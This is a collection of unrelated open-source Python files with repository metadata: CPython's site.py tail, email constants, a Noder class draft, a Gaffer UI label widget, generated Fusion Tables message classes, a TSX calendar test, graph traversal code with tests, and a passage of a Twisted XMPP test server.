            sys.excepthook(*sys.exc_info())
        else:
            sys.stderr.write(
                "Error in usercustomize; set PYTHONVERBOSE for traceback:\n"
                "%s: %s\n" %
                (err.__class__.__name__, err))
def main():
    """Add standard site-specific directories to the module search path.

    This function is called automatically when this module is imported,
    unless the python interpreter was started with the -S flag.
    """
    global ENABLE_USER_SITE

    orig_path = sys.path[:]
    known_paths = removeduppaths()
    if orig_path != sys.path:
        # removeduppaths() might make sys.path absolute.
        # fix __file__ and __cached__ of already imported modules too.
        abs_paths()

    # venv() runs first so a virtual environment takes precedence and can
    # disable user site-packages via pyvenv.cfg.
    known_paths = venv(known_paths)
    if ENABLE_USER_SITE is None:
        ENABLE_USER_SITE = check_enableusersite()
    known_paths = addusersitepackages(known_paths)
    known_paths = addsitepackages(known_paths)
    setquit()
    setcopyright()
    sethelper()
    if not sys.flags.isolated:
        # Isolated mode (-I) skips automatic readline configuration.
        enablerlcompleter()
    execsitecustomize()
    if ENABLE_USER_SITE:
        execusercustomize()
# Prevent extending of sys.path when python was started with -S and
# site is imported later.
# (sys.flags.no_site is true under -S.)
if not sys.flags.no_site:
    main()
def _script():
    """Command-line entry point for ``python -m site``.

    Without arguments, print sys.path and the user-site configuration.
    With --user-base / --user-site, print the requested paths and exit
    with a status code describing the user-site state (see help text).
    """
    # NOTE(review): "uses site directory" below looks like a typo for
    # "user site directory" — it is runtime output, left unchanged here.
    help = """\
    %s [--user-base] [--user-site]

    Without arguments print some useful information
    With arguments print the value of USER_BASE and/or USER_SITE separated
    by '%s'.

    Exit codes with --user-base or --user-site:
      0 - user site directory is enabled
      1 - user site directory is disabled by user
      2 - uses site directory is disabled by super user
          or for security reasons
     >2 - unknown error
    """
    args = sys.argv[1:]
    if not args:
        # Informational mode: dump the effective path configuration.
        user_base = getuserbase()
        user_site = getusersitepackages()
        print("sys.path = [")
        for dir in sys.path:
            print("    %r," % (dir,))
        print("]")
        print("USER_BASE: %r (%s)" % (user_base,
            "exists" if os.path.isdir(user_base) else "doesn't exist"))
        print("USER_SITE: %r (%s)" % (user_site,
            "exists" if os.path.isdir(user_site) else "doesn't exist"))
        print("ENABLE_USER_SITE: %r" % ENABLE_USER_SITE)
        sys.exit(0)

    buffer = []
    if '--user-base' in args:
        buffer.append(USER_BASE)
    if '--user-site' in args:
        buffer.append(USER_SITE)

    if buffer:
        print(os.pathsep.join(buffer))
        # Exit code encodes the user-site state (see help text above).
        if ENABLE_USER_SITE:
            sys.exit(0)
        elif ENABLE_USER_SITE is False:
            sys.exit(1)
        elif ENABLE_USER_SITE is None:
            sys.exit(2)
        else:
            sys.exit(3)
    else:
        import textwrap
        print(textwrap.dedent(help % (sys.argv[0], os.pathsep)))
        sys.exit(10)
# Allow "python -m site" to inspect the path configuration.
if __name__ == '__main__':
    _script()
|
{
"content_hash": "40a97e5e4f9a50e5c9fbda232b47fe7a",
"timestamp": "",
"source": "github",
"line_count": 640,
"max_line_length": 84,
"avg_line_length": 33.8265625,
"alnum_prop": 0.6160561688761605,
"repo_name": "zooba/PTVS",
"id": "ad1146332b0ab7b65df640069bbeb4b6494bbad9",
"size": "21649",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "Python/Product/Miniconda/Miniconda3-x64/Lib/site.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "109"
},
{
"name": "Batchfile",
"bytes": "10898"
},
{
"name": "C",
"bytes": "23236"
},
{
"name": "C#",
"bytes": "12390821"
},
{
"name": "C++",
"bytes": "209386"
},
{
"name": "CSS",
"bytes": "7025"
},
{
"name": "HTML",
"bytes": "34251"
},
{
"name": "JavaScript",
"bytes": "87257"
},
{
"name": "PowerShell",
"bytes": "25220"
},
{
"name": "Python",
"bytes": "888412"
},
{
"name": "Rich Text Format",
"bytes": "260880"
},
{
"name": "Smarty",
"bytes": "8156"
},
{
"name": "Tcl",
"bytes": "24968"
}
],
"symlink_target": ""
}
|
# Section/sheet names used when loading the email source data.
# NOTE(review): presumed to be spreadsheet tab names — confirm against callers.
EMAILS = 'Emails'
RECIPIENTS = 'Recipients'
# Special variable names
BODY = 'email_body'
DATE = 'email_date'
FROM = 'email_from'
REPLY_TO = 'email_reply_to'
SUBJECT = 'email_subject'
PREFIX = '__prefix__'
# Recipient column names
HIGHLIGHT = 'highlight'
|
{
"content_hash": "adaae83d1722894ad94ec0948a84ca6d",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 27,
"avg_line_length": 19.692307692307693,
"alnum_prop": 0.69921875,
"repo_name": "WhiteHalmos/emailer",
"id": "205fc4ba66bbd06527f1715eafdf153d92d42f52",
"size": "270",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emailer/name.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "546"
},
{
"name": "Python",
"bytes": "58411"
}
],
"symlink_target": ""
}
|
"""
<DefineSource>
@Date : Fri Nov 14 13:20:38 2014 \n
@Author : Erwan Ledoux \n\n
</DefineSource>
A Noder defines Child ordered dicts with <DoStr> as KeyStr.
The items inside are automatically setted with Noded<DoStr><TypeStr> and have
a Pointer to the parent InstanceVariable. This is the beginning for buiding high
arborescent and (possibly circular) structures of objects.
"""
#<DefineAugmentation>
import ShareYourSystem as SYS
BaseModuleStr="ShareYourSystem.Applyiers.Weaver"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Classer"
SYS.setSubModule(globals())
#</DefineAugmentation>
#<ImportSpecificModules>
import collections
from ShareYourSystem.Standards.Itemizers import Pather
from ShareYourSystem.Functers import Imitater
#</ImportSpecificModules>
#<DefineLocals>
# Delimiters of the '<Collection>Key' syntax that NoderClass.get/set parse
# to route accesses into a noded collection.
NodingPrefixGetStr='<'
NodingSuffixGetStr='>'
#</DefineLocals>
#<DefineClass>
@DecorationClass()
class NoderClass(BaseClass):
    """Maintain Child ordered dicts keyed by a collection string.

    Noded children automatically receive a Noded<Collection>Int index, a
    Noded<Collection>KeyStr and a Noded<Collection>ParentPointer back to this
    instance, allowing arborescent (possibly circular) object structures.

    Fix over the previous draft: the ``try:`` statements in ``do_node`` had
    been commented out, leaving dangling ``except AttributeError:`` clauses
    (a SyntaxError); they are restored here together with the key-string
    assignments they rely on.
    """

    # Attributes displayed by the framework's representation machinery.
    RepresentingKeyStrsList=[
        'NodingCollectionStr',
        'NodedPrefixStr',
        'NodedKeyStrKeyStr',
        'NodePointDeriveNoder',
        'NodedInt'
    ]

    def default_init(self,
                     _NodingCollectionStr="",
                     _NodedCollectionOrderedDict=None,
                     _NodedPrefixStr="",
                     _NodedKeyStrKeyStr="",
                     _NodePointDeriveNoder=None,
                     _NodedInt=-1,
                     **_KwargVariablesDict
                     ):
        #Call the parent init method
        BaseClass.__init__(self, **_KwargVariablesDict)

    def do_node(self, **_KwargVariablesDict):
        """Bind (creating lazily) the Noded<Collection>CollectionOrderedDict
        and, when noding a tree of noders, the per-collection Int and
        ParentPointer attributes."""
        if self.NodingCollectionStr != "":

            #set the NodedPrefixStr
            self.NodedPrefixStr = 'Noded' + self.NodingCollectionStr

            #set the Noded OrderedDict
            NodedCollectionOrderedSetTagStr = self.NodedPrefixStr + 'CollectionOrderedDict'
            try:
                self.NodedCollectionOrderedDict = getattr(
                    self, NodedCollectionOrderedSetTagStr)
            except AttributeError:
                # First access for this collection: create its ordered dict.
                self.__setattr__(
                    NodedCollectionOrderedSetTagStr, collections.OrderedDict())
                self.NodedCollectionOrderedDict = getattr(
                    self, NodedCollectionOrderedSetTagStr)

            #If this is a set of a tree of nodes then also init the nodifying attributes
            if 'IsNoderBool' not in _KwargVariablesDict or _KwargVariablesDict['IsNoderBool']:

                NodePointDeriveNoderKeyStr = self.NodedPrefixStr + 'ParentPointer'
                NodedIntKeyStr = self.NodedPrefixStr + 'Int'

                try:
                    self.NodedInt = getattr(self, NodedIntKeyStr)
                except AttributeError:
                    # Default index of -1 marks "not yet inserted".
                    self.__setattr__(NodedIntKeyStr, -1)
                    self.NodedInt = getattr(self, NodedIntKeyStr)

                try:
                    self.NodePointDeriveNoder = getattr(
                        self, NodePointDeriveNoderKeyStr)
                except AttributeError:
                    self.__setattr__(NodePointDeriveNoderKeyStr, None)
                    self.NodePointDeriveNoder = getattr(
                        self, NodePointDeriveNoderKeyStr)

    #<Hook>@Hooker.HookerClass(**{'HookingAfterVariablesList':[BaseClass.get]})
    @Imitater.ImitaterClass()
    def get(self):
        """Route '<Collection>Key' style gets into the noded collection;
        other keys fall through to the parent get."""
        OutputDict = {'HookingIsBool': True}

        if self.GettingKeyVariable.startswith(NodingPrefixGetStr):

            #Split '<Collection>Key' into collection name and key parts.
            SplittedStrsList = self.GettingKeyVariable.split(NodingSuffixGetStr)
            NodingCollectionStr = NodingPrefixGetStr.join(
                SplittedStrsList[0].split(NodingPrefixGetStr)[1:])

            #Bind the corresponding collection (no child nodification here).
            self.node(NodingCollectionStr, **{'IsNoderBool': False})

            KeyStr = NodingSuffixGetStr.join(SplittedStrsList[1:])

            if KeyStr.isdigit():
                #Get with a digited KeyStr case: positional access.
                GettingInt = int(KeyStr)
                if GettingInt < len(self.NodedCollectionOrderedDict):
                    self.GettedValueVariable = SYS.get(
                        self.NodedCollectionOrderedDict, 'values', GettingInt)
                    OutputDict['HookingIsBool'] = False
            elif KeyStr == "":
                #Empty key returns all the noded values.
                self.GettedValueVariable = self.NodedCollectionOrderedDict.values()
                OutputDict['HookingIsBool'] = False
            elif KeyStr in self.NodedCollectionOrderedDict:
                self.GettedValueVariable = self.NodedCollectionOrderedDict[KeyStr]
                OutputDict['HookingIsBool'] = False

        #Call the parent get method
        if OutputDict['HookingIsBool']:
            BaseClass.get(self)

    #<Hook>@Hooker.HookerClass(**{'HookingAfterVariablesList':[BaseClass.set]})
    @Imitater.ImitaterClass()
    def set(self):
        """Route '<Collection>Key' style sets into the noded collection;
        noder values also receive their Int, KeyStr and ParentPointer."""
        OutputDict = {'HookingIsBool': True}

        if self.SettingKeyVariable.startswith(NodingPrefixGetStr):

            SplittedStrsList = self.SettingKeyVariable.split(NodingSuffixGetStr)
            NodingCollectionStr = NodingPrefixGetStr.join(
                SplittedStrsList[0].split(NodingPrefixGetStr)[1:])

            #Check if it is an append of Nodes
            IsNoderBool = 'NoderClass' in map(
                lambda __Class:
                    __Class.__name__,
                type(self.SettingValueVariable).__mro__
            )

            #Nodify
            self.node(NodingCollectionStr, **{'IsNoderBool': IsNoderBool})

            SettedKeyStr = NodingSuffixGetStr.join(SplittedStrsList[1:])

            #Append (or set if it is already in)
            Pather.setWithPathVariableAndKeyVariable(
                self.NodedCollectionOrderedDict,
                Pather.PathPrefixStr + SettedKeyStr,
                self.SettingValueVariable
            )

            #If it is an object, wire the child back to this parent.
            if IsNoderBool:
                self.SettingValueVariable.__setattr__(
                    self.NodedPrefixStr + 'Int',
                    len(self.NodedCollectionOrderedDict) - 1)
                NodedStrKeyStr = self.NodedPrefixStr + 'KeyStr'
                self.SettingValueVariable.__setitem__(NodedStrKeyStr, SettedKeyStr)
                self.SettingValueVariable.__setattr__(
                    self.NodedPrefixStr + 'ParentPointer', self)

            OutputDict['HookingIsBool'] = False

        #Call the parent set method
        if OutputDict['HookingIsBool']:
            BaseClass.set(self)
#</DefineClass>
|
{
"content_hash": "7bc6fcd8104d2c9fccd7ef806c65a29e",
"timestamp": "",
"source": "github",
"line_count": 302,
"max_line_length": 107,
"avg_line_length": 25.5,
"alnum_prop": 0.7093883911180366,
"repo_name": "Ledoux/ShareYourSystem",
"id": "e08be7a33bb3e2b51dd9c0036dad1eb404fe6d7f",
"size": "7725",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Pythonlogy/ShareYourSystem/Standards/Itemizers/Teamer/draft/__init__ copy 2.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "86"
},
{
"name": "C++",
"bytes": "4244220"
},
{
"name": "CSS",
"bytes": "142769"
},
{
"name": "CoffeeScript",
"bytes": "37331"
},
{
"name": "HTML",
"bytes": "36211676"
},
{
"name": "JavaScript",
"bytes": "2147968"
},
{
"name": "Jupyter Notebook",
"bytes": "7930602"
},
{
"name": "Makefile",
"bytes": "6362"
},
{
"name": "PHP",
"bytes": "11096341"
},
{
"name": "Python",
"bytes": "5700092"
},
{
"name": "Ruby",
"bytes": "60"
},
{
"name": "Scala",
"bytes": "2412"
},
{
"name": "Shell",
"bytes": "2525"
},
{
"name": "Swift",
"bytes": "154"
},
{
"name": "TeX",
"bytes": "2556"
},
{
"name": "XSLT",
"bytes": "20993"
}
],
"symlink_target": ""
}
|
import IECore
import Gaffer
import GafferUI
## The NameLabel class displays a label which is kept in sync with the name of
# a particular GraphComponent. The label acts as a drag source for dragging the
# GraphComponent to another widget.
class NameLabel( GafferUI.Label ) :

	def __init__( self, graphComponent, horizontalAlignment=GafferUI.Label.HorizontalAlignment.Left, verticalAlignment=GafferUI.Label.VerticalAlignment.Center,**kw ) :

		GafferUI.Label.__init__( self, "", horizontalAlignment, verticalAlignment, **kw )

		self.setGraphComponent( graphComponent )

		# Connections stored as members so they share the widget's lifetime.
		# NOTE(review): assumes Gaffer connections are released with the owner.
		self.__buttonPressConnection = self.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ) )
		self.__dragBeginConnection = self.dragBeginSignal().connect( Gaffer.WeakMethod( self.__dragBegin ) )
		self.__dragEndConnection = self.dragEndSignal().connect( Gaffer.WeakMethod( self.__dragEnd ) )

	## Calling setText() disables the name tracking behaviour.
	def setText( self, text ) :

		GafferUI.Label.setText( self, text )

		# Dropping the connection stops __setText() from overwriting the
		# explicit text on later name changes.
		self.__nameChangedConnection = None

	def setGraphComponent( self, graphComponent ) :

		self.__graphComponent = graphComponent

		# Track renames of the new component (or stop tracking for None).
		if self.__graphComponent is not None :
			self.__nameChangedConnection = self.__graphComponent.nameChangedSignal().connect( Gaffer.WeakMethod( self.__setText ) )
		else :
			self.__nameChangedConnection = None

		self.__setText()

	def getGraphComponent( self ) :

		return self.__graphComponent

	def __setText( self, *unwantedArgs ) :

		# Re-derive the label text from the component name, turning
		# CamelCase into spaced words.
		if self.getGraphComponent() is not None :
			GafferUI.Label.setText( self, IECore.CamelCase.toSpaced( self.__graphComponent.getName() ) )

	def __buttonPress( self, widget, event ) :

		# Only left/middle button presses may start a drag.
		return self.getGraphComponent() is not None and event.buttons & ( event.Buttons.Left | event.Buttons.Middle )

	def __dragBegin( self, widget, event ) :

		if event.buttons & ( event.Buttons.Left | event.Buttons.Middle ) :
			GafferUI.Pointer.setFromFile( "nodes.png" )
			return self.getGraphComponent()

		return None

	def __dragEnd( self, widget, event ) :

		GafferUI.Pointer.set( None )
|
{
"content_hash": "452ca71dbf8d062e0d4b7999e876d039",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 164,
"avg_line_length": 34.21311475409836,
"alnum_prop": 0.7307139434595112,
"repo_name": "DoubleNegativeVisualEffects/gaffer",
"id": "86756ceb1d92b2f0bbc3a3580a30f6407f3e5573",
"size": "3904",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/GafferUI/NameLabel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Generated message classes for fusiontables version v1.
API for working with Fusion Tables data.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from protorpc import messages
package = 'fusiontables'
class Column(messages.Message):
  """Specifies the id, name and type of a column in a table.

  Messages:
    BaseColumnValue: Optional identifier of the base column. If present, this
      column is derived from the specified base column.

  Fields:
    baseColumn: Optional identifier of the base column. If present, this
      column is derived from the specified base column.
    columnId: Identifier for the column.
    description: Optional column description.
    graph_predicate: Optional column predicate. Used to map table to
      graph data model (subject,predicate,object) See
      http://www.w3.org/TR/2014/REC-rdf11-concepts-20140225/#data-model
    kind: Type name: a template for an individual column.
    name: Required name of the column.
    type: Required type of the column.
  """

  class BaseColumnValue(messages.Message):
    """Optional identifier of the base column. If present, this column is
    derived from the specified base column.

    Fields:
      columnId: The id of the column in the base table from which
        this column is derived.
      tableIndex: Offset to the entry in the list of base tables
        in the table definition.
    """

    # Field numbers are part of the wire format; never renumber them.
    columnId = messages.IntegerField(1, variant=messages.Variant.INT32)
    tableIndex = messages.IntegerField(2, variant=messages.Variant.INT32)

  # Field numbers are part of the wire format; never renumber them.
  baseColumn = messages.MessageField('BaseColumnValue', 1)
  columnId = messages.IntegerField(2, variant=messages.Variant.INT32)
  description = messages.StringField(3)
  graph_predicate = messages.StringField(4)
  kind = messages.StringField(5, default=u'fusiontables#column')
  name = messages.StringField(6)
  type = messages.StringField(7)
class ColumnList(messages.Message):
  """Represents a list of columns in a table.

  Fields:
    items: List of all requested columns.
    kind: Type name: a list of all columns.
    nextPageToken: Token used to access the next page of this
      result. No token is displayed if there are no more pages left.
    totalItems: Total number of columns for the table.
  """

  items = messages.MessageField('Column', 1, repeated=True)
  # Fixed discriminator string; the default is the literal type name.
  kind = messages.StringField(2, default=u'fusiontables#columnList')
  nextPageToken = messages.StringField(3)
  totalItems = messages.IntegerField(4, variant=messages.Variant.INT32)
class FusiontablesColumnListRequest(messages.Message):
  """A FusiontablesColumnListRequest object.

  Fields:
    maxResults: Maximum number of columns to return. Optional. Default is 5.
    pageToken: Continuation token specifying which result page to return.
      Optional.
    tableId: Table whose columns are being listed.
  """

  # UINT32 variant: negative page sizes are not representable on the wire.
  maxResults = messages.IntegerField(1, variant=messages.Variant.UINT32)
  pageToken = messages.StringField(2)
  tableId = messages.StringField(3, required=True)
class FusiontablesColumnListAlternateRequest(messages.Message):
  """A FusiontablesColumnListAlternateRequest object.

  Alternate form of FusiontablesColumnListRequest that names the page-size
  field ``pageSize`` instead of ``maxResults``.

  Fields:
    pageSize: Maximum number of columns to return. Optional. Default is 5.
    pageToken: Continuation token specifying which result page to return.
      Optional.
    tableId: Table whose columns are being listed.
  """

  pageSize = messages.IntegerField(1, variant=messages.Variant.UINT32)
  pageToken = messages.StringField(2)
  tableId = messages.StringField(3, required=True)
class ColumnListAlternate(messages.Message):
  """Represents a list of columns in a table.

  Alternate form of ColumnList whose repeated field is named ``columns``
  rather than ``items``.

  Fields:
    columns: List of all requested columns.
    kind: Type name: a list of all columns.
    nextPageToken: Token used to access the next page of this
      result. No token is displayed if there are no more pages left.
    totalItems: Total number of columns for the table.
  """

  columns = messages.MessageField('Column', 1, repeated=True)
  # NOTE(review): shares the u'fusiontables#columnList' default with
  # ColumnList above — presumably intentional for this alternate shape.
  kind = messages.StringField(2, default=u'fusiontables#columnList')
  nextPageToken = messages.StringField(3)
  totalItems = messages.IntegerField(4, variant=messages.Variant.INT32)
|
{
"content_hash": "10addf39cca841a387b7e352551a61d4",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 79,
"avg_line_length": 34.0078125,
"alnum_prop": 0.7093958189754193,
"repo_name": "wemanuel/smry",
"id": "fd727a0aa25ef746f9616d50053d7c546b30e739",
"size": "4353",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "smry/server-auth/ls/google-cloud-sdk/platform/gsutil/third_party/apitools/apitools/base/py/testing/testclient/fusiontables_v1_messages.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3990"
},
{
"name": "Groff",
"bytes": "1221174"
},
{
"name": "HTML",
"bytes": "1873470"
},
{
"name": "JavaScript",
"bytes": "2192"
},
{
"name": "Makefile",
"bytes": "6032"
},
{
"name": "PHP",
"bytes": "16660"
},
{
"name": "Python",
"bytes": "47139164"
},
{
"name": "Shell",
"bytes": "37102"
},
{
"name": "SourcePawn",
"bytes": "1160"
}
],
"symlink_target": ""
}
|
import pandas as pd
import pytz
from pandas.testing import assert_index_equal
from pandas_market_calendars.exchange_calendar_tsx import TSXExchangeCalendar, VictoriaDay
def test_time_zone():
    """The TSX calendar must report the Canada/Eastern zone and be named 'TSX'."""
    expected_zone = pytz.timezone('Canada/Eastern')
    assert TSXExchangeCalendar().tz == expected_zone
    assert TSXExchangeCalendar().name == 'TSX'
def test_victoria_day():
    """Victoria Day must fall on the expected Monday in each year 2009-2020."""
    observed = VictoriaDay.dates('2009-01-01', '2020-12-31')
    holidays = [
        "2009-05-18", "2010-05-24", "2011-05-23", "2012-05-21",
        "2013-05-20", "2014-05-19", "2015-05-18", "2016-05-23",
        "2017-05-22", "2018-05-21", "2019-05-20", "2020-05-18",
    ]
    expected = pd.DatetimeIndex([pd.Timestamp(day) for day in holidays])
    assert_index_equal(observed, expected)
|
{
"content_hash": "f14ff4a318f414b2fa7a68c6bcdf1be6",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 90,
"avg_line_length": 29.483870967741936,
"alnum_prop": 0.6356673960612691,
"repo_name": "rsheftel/pandas_market_calendars",
"id": "00eb589c073fa4594c529f51185c94acb5e8d3cf",
"size": "914",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tsx_calendar.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "720451"
},
{
"name": "Shell",
"bytes": "155"
}
],
"symlink_target": ""
}
|
from collections import defaultdict, deque
from Queue import Queue
import unittest
class Graph:
    # Adjacency-set graph with BFS/DFS traversals, connected components and
    # Kosaraju's strongly-connected-components algorithm.
    #
    # NOTE(review): every method indexes self.adj_list[node] directly, so it
    # assumes *every* node appears as a key (nodes with no out-edges map to an
    # empty set) — confirm for new inputs.

    def __init__(self, adj_list):
        """
        Process the graph with the given adjacent list.
        :param adj_list:
            The given adjacent list. A dictionary with parent node as keys and
            values as set of the adjacent nodes.
        """
        self.adj_list = adj_list

    def bfs(self, start):
        # Breadth-first traversal from `start`, yielding nodes in visit order.
        node_q = Queue()
        node_q.put(start)
        visited = set()
        while not node_q.empty():
            node = node_q.get()  # FIFO
            if node not in visited:
                yield node
                visited.add(node)
                # Extends the Queue's underlying deque directly, bypassing
                # put(); relies on the (documented) `queue` attribute being a
                # deque. Visit order therefore depends on set iteration order.
                node_q.queue.extend(self.adj_list[node] - visited)

    def bfs_path(self, start, end):
        # Yields every shortest-first simple path from `start` to `end`,
        # carrying the partial path alongside each queued node.
        node_q = Queue()
        node_q.put((start, [start]))
        visited = {start}
        while not node_q.empty():
            parent, path = node_q.get()
            for child in self.adj_list[parent]:
                if child not in visited:
                    if child == end:
                        # `end` is deliberately never marked visited, so
                        # multiple distinct paths to it can be yielded.
                        yield path + [child]
                    else:
                        visited.add(child)
                        node_q.put((child, path + [child]))

    def connected_component(self):
        # Returns (number of components, list of components as BFS orderings).
        count = 0
        visited = set()
        connected_components = []
        for node in self.adj_list.keys():
            if node not in visited:
                count += 1
                bfs_nodes = list(self.bfs(node))
                # NOTE(review): the inner loop reuses the name `node`,
                # shadowing the outer loop variable; harmless here because
                # .keys() was evaluated before the loop began, but fragile.
                for node in bfs_nodes:
                    visited.add(node)
                connected_components.append(bfs_nodes)
        return count, connected_components

    def dfs(self, start, adj_list, visited=None):
        # Iterative depth-first traversal; `adj_list` is a parameter so the
        # same routine can walk the transposed graph (see Kosaraju below).
        node_s = deque()
        node_s.append(start)
        if visited is None:
            visited = set()
        while node_s:
            node = node_s.pop()  # LIFO
            if node not in visited:
                yield node
                visited.add(node)
                node_s.extend(adj_list[node] - visited)

    def strongly_connected_component(self):
        """
        Kosaraju's Algorithm.

        Two passes: (1) DFS on the original graph recording reverse finishing
        order, (2) DFS on the transposed graph in that order; each second-pass
        tree is one strongly connected component.
        """
        finish_time_stack = []
        strongly_connected_components = []
        visited = set()

        def dfs_util(start):
            """
            Subroutine to compute the finishing time stack. Iterative approach
            is preferred to avoid exceeding recursion depth.
            """
            node_s = deque()
            node_s.append(start)
            pop_set = set()  # for memoization of the processed elements.
            while node_s:
                node = node_s[-1]  # peek without popping
                visit_next = None  # for boundary condition.
                if node not in visited:
                    visited.add(node)
                    visit_next = self.adj_list[node] - visited
                    node_s.extend(visit_next)
                # No unvisited children => this node is "finished".
                if not visit_next:
                    node = node_s.pop()
                    if node not in pop_set:
                        finish_time_stack.append(node)
                        pop_set.add(node)

        # d.keys() creates a static list of the dictionary keys.
        # Otherwise, we get a pretty neat exception while processing
        # large graphs.
        # "RuntimeError: dictionary changed size during iteration".
        for node in self.adj_list.keys():
            if node not in visited:
                dfs_util(node)

        # Graph transpose can also be done while reading the file for optimisation.
        adj_list_invert = defaultdict(set)
        for head, tail in self.adj_list.items():
            for node in tail:
                adj_list_invert[node].add(head)

        # Second pass: walk the transpose in decreasing finishing time.
        visited = set()
        while finish_time_stack:
            start = finish_time_stack.pop()
            if start not in visited:
                newly_visited = set(self.dfs(start, adj_list_invert, visited))
                visited.update(newly_visited)
                strongly_connected_components.append(newly_visited)
        return strongly_connected_components
class GraphTest(unittest.TestCase):
    # NOTE(review): the expected traversal orderings below depend on set/dict
    # iteration order, which is hash-based and interpreter-specific — these
    # exact sequences were presumably recorded under the interpreter the file
    # was written for (it imports the Python 2 `Queue` module).

    def setUp(self):
        # Undirected-style test graph; 'G' is a sink with no out-edges.
        self.graph = Graph({'A': set(['B', 'C']),
                            'B': set(['A', 'D', 'E']),
                            'C': set(['A', 'F']),
                            'D': set(['B']),
                            'E': set(['B', 'F', 'G']),
                            'F': set(['C', 'E']),
                            'G': set()})

    def test_bfs(self):
        self.assertEqual(list(self.graph.bfs('A')),
                         ['A', 'C', 'B', 'F', 'E', 'D', 'G'])

    def test_bfs_path(self):
        # Both distinct simple paths from A to E, shortest first.
        self.assertEqual(list(self.graph.bfs_path('A', 'E')),
                         [['A', 'B', 'E'], ['A', 'C', 'F', 'E']])

    def test_connected_component(self):
        # Three components: {A,B,C}, {E,F} and the isolated {D}.
        self.graph = Graph({'A': set(['B', 'C']),
                            'B': set(['C', 'A']),
                            'C': set(['A', 'B']),
                            'D': set(),
                            'E': set(['F']),
                            'F': set(['E'])})
        self.assertEqual(self.graph.connected_component(),
                         (3, [['A', 'C', 'B'],
                              ['E', 'F'],
                              ['D']]))

    def test_dfs(self):
        # Note: set('E') iterates the string, yielding the one-element {'E'}.
        self.graph = Graph({'A': set(['B']),
                            'B': set(['C', 'D']),
                            'C': set(['A']),
                            'D': set('E'),
                            'E': set()})
        self.assertEqual(list(self.graph.dfs('A', self.graph.adj_list)),
                         ['A', 'B', 'D', 'E', 'C'])

    def test_strongly_connected_components(self):
        self.graph = Graph({1: set([2]),
                            2: set([3,4,6]),
                            3: set([1,4]),
                            4: set([5]),
                            5: set([4]),
                            6: set([5,7]),
                            7: set([6,8]),
                            8: set([5,7])})
        self.assertEqual(self.graph.strongly_connected_component(),
                         [{1,3,2}, {6,7,8}, {5,4}])
# Allow running this module directly as a test script.
if __name__ == "__main__":
    unittest.main()
|
{
"content_hash": "ba78cd47f59ce338f2dcaca15d8c3da1",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 83,
"avg_line_length": 34.97752808988764,
"alnum_prop": 0.4376806938644395,
"repo_name": "gzc/CLRS",
"id": "4c57a3d74da4ac539c234a20086b9f1f641959fd",
"size": "6226",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "C22-Elementary-Graph-Algorithms/elementary_graph_algo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "29845"
},
{
"name": "C++",
"bytes": "153168"
},
{
"name": "Makefile",
"bytes": "2947"
},
{
"name": "Python",
"bytes": "64808"
}
],
"symlink_target": ""
}
|
from twisted.python import log
from twisted.internet import defer
from twisted.words.protocols.jabber import error, ijabber, jstrports, xmlstream
from twisted.words.protocols.jabber import component
class XmppTestServerFactory(xmlstream.XmlStreamServerFactory):
    """Server-side XML stream factory used by the test suite.

    Tracks a single component connection through ``cstate``
    (0 = disconnected, 1 = connected, 2 = authenticated) and buffers
    incoming stanzas so tests can await them one at a time via deferreds.
    """

    def __init__(self, starter):
        def makeAuthenticator():
            return component.ListenComponentAuthenticator('test')

        xmlstream.XmlStreamServerFactory.__init__(self, makeAuthenticator)
        self.addBootstrap(xmlstream.STREAM_CONNECTED_EVENT,
                          self.onConnectionMade)
        self.addBootstrap(xmlstream.STREAM_AUTHD_EVENT,
                          self.onAuthenticated)
        self.starter = starter
        self.component = None
        self.cstate = 0
        self.listeners = []
        self.queue = []

    def onConnectionMade(self, xs):
        log.msg("New connection: %r" % (xs,))
        assert self.cstate == 0
        self.cstate = 1

        # Wire up raw traffic logging to help diagnose test failures.
        def traceIncoming(buf):
            log.msg("RECV (tf): %r" % (buf,))

        def traceOutgoing(buf):
            log.msg("SEND (tf): %r" % (buf,))

        xs.rawDataInFn = traceIncoming
        xs.rawDataOutFn = traceOutgoing
        xs.addObserver(xmlstream.STREAM_ERROR_EVENT, self.onError)

    def onAuthenticated(self, xs):
        assert self.cstate == 1
        self.cstate = 2
        destination = xs.thisEntity.host
        self.component = xs
        xs.addObserver(xmlstream.STREAM_END_EVENT, self.onConnectionLost, 0,
                       destination, xs)
        xs.addObserver('/*', self.onStanza)
        self.starter(self)

    def onError(self, reason):
        log.err(reason, "Stream Error")

    def onConnectionLost(self, destination, xs, reason):
        assert self.cstate > 0
        xs.removeObserver('/*', self.onStanza)
        self.component = None
        self.cstate = 0

    def onStanza(self, stanza):
        # First pair up any stanzas that were buffered before a listener
        # was waiting, oldest first.
        while self.queue and self.listeners:
            waiting = self.listeners.pop(0)
            waiting.callback(self.queue.pop(0))
        # Then deliver the new stanza, or buffer it if nobody is waiting.
        if not self.listeners:
            self.queue.append(stanza)
        else:
            self.listeners.pop(0).callback(stanza)

    def stanzaReset(self):
        # Drop both buffered stanzas and outstanding deferreds.
        self.queue = []
        self.listeners = []

    def stanzaRecv(self):
        # Return a deferred that fires with the next stanza: immediately if
